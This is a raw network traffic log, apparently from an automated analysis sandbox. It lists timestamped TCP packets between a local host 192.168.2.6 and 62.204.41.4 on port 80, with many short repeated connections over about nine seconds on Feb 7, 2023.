Feb 7, 2023 20:00:58.312197924 CET	49748	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.313533068 CET	49749	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.373100042 CET	80	49748	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.373274088 CET	49748	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.376118898 CET	80	49749	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.376302958 CET	49749	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.376847982 CET	49749	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.439537048 CET	80	49749	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.441658020 CET	80	49749	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.441756964 CET	49749	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.558273077 CET	49749	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.559550047 CET	49750	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.621090889 CET	80	49750	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.621164083 CET	80	49749	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.621226072 CET	49750	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.621273041 CET	49749	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.621944904 CET	49750	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.684221983 CET	80	49750	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.685926914 CET	80	49750	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.686120033 CET	49750	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.807406902 CET	49750	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.808864117 CET	49751	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.868967056 CET	80	49750	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.869210958 CET	80	49751	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.869225025 CET	49750	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.869554043 CET	49751	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.872163057 CET	49751	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.932595015 CET	80	49751	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.934767008 CET	80	49751	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.934895992 CET	49751	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.043762922 CET	49751	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.044867992 CET	49752	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.104465961 CET	80	49751	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.104604959 CET	49751	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.106216908 CET	80	49752	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.106374025 CET	49752	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.119448900 CET	49752	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.180921078 CET	80	49752	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.184709072 CET	80	49752	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.184799910 CET	49752	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.292309046 CET	49752	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.293263912 CET	49753	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.353882074 CET	80	49752	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.353959084 CET	49752	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.354581118 CET	80	49753	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.354726076 CET	49753	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.355094910 CET	49753	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.416547060 CET	80	49753	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.418791056 CET	80	49753	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.418997049 CET	49753	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.551306009 CET	49753	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.552696943 CET	49754	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.612899065 CET	80	49753	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.613101006 CET	49753	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.614417076 CET	80	49754	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.614607096 CET	49754	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.616651058 CET	49754	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.678493977 CET	80	49754	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.680761099 CET	80	49754	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.680886984 CET	49754	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.791963100 CET	49754	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.792956114 CET	49755	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.853470087 CET	80	49755	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.853604078 CET	49755	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.853737116 CET	80	49754	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.854980946 CET	49754	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.855021000 CET	49755	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:59.915539026 CET	80	49755	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.919234037 CET	80	49755	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:59.919346094 CET	49755	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.029222012 CET	49755	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.030014038 CET	49756	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.090148926 CET	80	49755	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.090285063 CET	49755	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.091609001 CET	80	49756	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.091742992 CET	49756	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.094396114 CET	49756	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.156018019 CET	80	49756	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.159466028 CET	80	49756	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.160327911 CET	49756	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.276499033 CET	49756	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.277494907 CET	49757	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.337392092 CET	80	49757	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.338087082 CET	49757	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.338092089 CET	80	49756	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.338169098 CET	49756	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.338640928 CET	49757	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.398314953 CET	80	49757	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.400506020 CET	80	49757	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.400656939 CET	49757	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.510581970 CET	49757	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.511354923 CET	49758	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.570646048 CET	80	49757	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.570764065 CET	49757	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.572808981 CET	80	49758	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.573007107 CET	49758	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.586842060 CET	49758	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.648233891 CET	80	49758	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.650304079 CET	80	49758	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.654498100 CET	49758	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.765961885 CET	49758	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.767050028 CET	49759	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.827755928 CET	80	49758	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.827975988 CET	49758	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.828425884 CET	80	49759	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.828576088 CET	49759	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.829526901 CET	49759	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:00.891056061 CET	80	49759	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.893472910 CET	80	49759	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:00.893657923 CET	49759	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.010792971 CET	49759	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.011584997 CET	49761	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.072571039 CET	80	49759	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.072825909 CET	49759	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.073199987 CET	80	49761	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.073343039 CET	49761	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.073822021 CET	49761	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.135385990 CET	80	49761	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.139965057 CET	80	49761	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.140065908 CET	49761	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.244966984 CET	49761	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.245749950 CET	49762	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.306833029 CET	80	49761	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.307041883 CET	49761	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.307285070 CET	80	49762	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.307472944 CET	49762	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.308697939 CET	49762	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.370223045 CET	80	49762	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.373136997 CET	80	49762	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.373297930 CET	49762	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.487795115 CET	49762	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.488780975 CET	49763	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.549297094 CET	80	49763	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.549361944 CET	80	49762	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.549587965 CET	49762	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.550107002 CET	49763	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.550107002 CET	49763	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.610586882 CET	80	49763	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.612922907 CET	80	49763	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.613168001 CET	49763	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.729712963 CET	49763	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.730566978 CET	49764	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.790292025 CET	80	49763	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.790371895 CET	49763	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.793095112 CET	80	49764	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.793236971 CET	49764	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.795053005 CET	49764	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:01.857687950 CET	80	49764	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.859669924 CET	80	49764	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:01.859817028 CET	49764	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.030199051 CET	49764	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.031290054 CET	49765	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.092952013 CET	80	49764	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.092998981 CET	80	49765	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.093235016 CET	49765	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.093316078 CET	49764	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.096121073 CET	49765	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.157862902 CET	80	49765	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.162086964 CET	80	49765	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.162287951 CET	49765	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.276860952 CET	49765	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.278430939 CET	49766	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.338784933 CET	80	49765	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.338967085 CET	49765	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.340930939 CET	80	49766	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.341207981 CET	49766	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.341784954 CET	49766	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.404205084 CET	80	49766	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.408010006 CET	80	49766	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.408297062 CET	49766	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.511446953 CET	49766	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.512542963 CET	49767	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.573864937 CET	80	49766	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.573894024 CET	80	49767	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.574090004 CET	49766	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.574194908 CET	49767	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.575090885 CET	49767	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.636591911 CET	80	49767	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.641204119 CET	80	49767	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.641473055 CET	49767	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.746608973 CET	49767	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.747816086 CET	49768	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.808232069 CET	80	49767	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.808444023 CET	49767	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.810224056 CET	80	49768	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.810512066 CET	49768	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.811172962 CET	49768	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.873533010 CET	80	49768	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.876564026 CET	80	49768	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:02.876662970 CET	49768	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.982095003 CET	49768	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:02.983704090 CET	49769	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.043025970 CET	80	49769	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.043181896 CET	49769	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.043961048 CET	49769	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.044497967 CET	80	49768	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.044583082 CET	49768	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.103138924 CET	80	49769	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.107919931 CET	80	49769	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.108084917 CET	49769	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.223102093 CET	49769	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.224046946 CET	49770	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.282480955 CET	80	49769	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.282721996 CET	49769	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.285319090 CET	80	49770	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.285619974 CET	49770	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.285970926 CET	49770	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.347162962 CET	80	49770	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.349364042 CET	80	49770	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.349455118 CET	49770	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.467390060 CET	49770	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.468770981 CET	49771	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.528803110 CET	80	49770	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.528971910 CET	49770	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.529253006 CET	80	49771	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.529409885 CET	49771	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.532617092 CET	49771	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.593183041 CET	80	49771	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.595849991 CET	80	49771	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.596031904 CET	49771	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.715229034 CET	49771	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.716133118 CET	49772	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.776000977 CET	80	49771	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.776159048 CET	49771	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.778640985 CET	80	49772	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.778764963 CET	49772	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.779261112 CET	49772	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.841566086 CET	80	49772	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.843966007 CET	80	49772	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:03.844151974 CET	49772	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.975300074 CET	49772	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:03.976031065 CET	49773	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.037540913 CET	80	49773	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.037574053 CET	80	49772	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.037745953 CET	49772	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.038337946 CET	49773	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.038337946 CET	49773	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.099762917 CET	80	49773	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.103609085 CET	80	49773	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.103876114 CET	49773	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.214126110 CET	49773	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.216212034 CET	49774	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.275754929 CET	80	49773	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.277828932 CET	80	49774	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.278042078 CET	49773	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.278086901 CET	49774	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.281618118 CET	49774	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.343143940 CET	80	49774	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.345859051 CET	80	49774	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.346127987 CET	49774	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.450556040 CET	49774	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.453031063 CET	49775	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.512209892 CET	80	49774	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.514547110 CET	49774	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.515410900 CET	80	49775	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.515727043 CET	49775	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.516284943 CET	49775	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.578528881 CET	80	49775	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.580698013 CET	80	49775	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.580943108 CET	49775	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.699789047 CET	49775	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.701033115 CET	49777	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.762290955 CET	80	49775	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.762362003 CET	80	49777	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.762442112 CET	49775	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.762492895 CET	49777	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.763084888 CET	49777	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.824553013 CET	80	49777	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.827470064 CET	80	49777	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.830619097 CET	49777	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.933696985 CET	49777	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.934915066 CET	49778	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.994843006 CET	80	49778	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.994987011 CET	49778	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.995275974 CET	80	49777	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:04.995378971 CET	49777	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:04.997292995 CET	49778	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.056725979 CET	80	49778	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.060085058 CET	80	49778	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.060285091 CET	49778	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.167840004 CET	49778	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.168823004 CET	49779	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.227994919 CET	80	49778	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.228199959 CET	49778	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.231514931 CET	80	49779	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.231797934 CET	49779	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.232359886 CET	49779	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.294585943 CET	80	49779	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.296737909 CET	80	49779	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.296957970 CET	49779	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.416882038 CET	49779	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.418044090 CET	49780	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.479312897 CET	80	49779	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.479576111 CET	49779	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.480426073 CET	80	49780	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.480608940 CET	49780	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.481040001 CET	49780	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.543351889 CET	80	49780	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.545506954 CET	80	49780	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.545646906 CET	49780	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.659903049 CET	49780	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.660914898 CET	49781	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.722512960 CET	80	49780	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.722685099 CET	49780	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.723190069 CET	80	49781	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.723313093 CET	49781	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.723793983 CET	49781	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.786051035 CET	80	49781	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.788511992 CET	80	49781	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:05.788634062 CET	49781	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.997456074 CET	49781	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:05.998256922 CET	49782	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.059680939 CET	80	49782	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.059926987 CET	80	49781	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.059943914 CET	49782	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.060199022 CET	49781	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.291220903 CET	49782	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.352859020 CET	80	49782	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.356937885 CET	80	49782	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.357093096 CET	49782	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.558049917 CET	49782	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.558909893 CET	49783	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.619646072 CET	80	49783	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.619704962 CET	80	49782	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.619894981 CET	49783	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.620028973 CET	49782	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.638993979 CET	49783	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.699956894 CET	80	49783	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.706861973 CET	80	49783	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.706995964 CET	49783	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.826986074 CET	49783	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.829476118 CET	49784	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.887984037 CET	80	49783	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.888180017 CET	49783	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.891916990 CET	80	49784	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.892146111 CET	49784	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.918802023 CET	49784	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:06.981659889 CET	80	49784	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.983558893 CET	80	49784	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:06.983676910 CET	49784	80	192.168.2.6	62.204.41.4
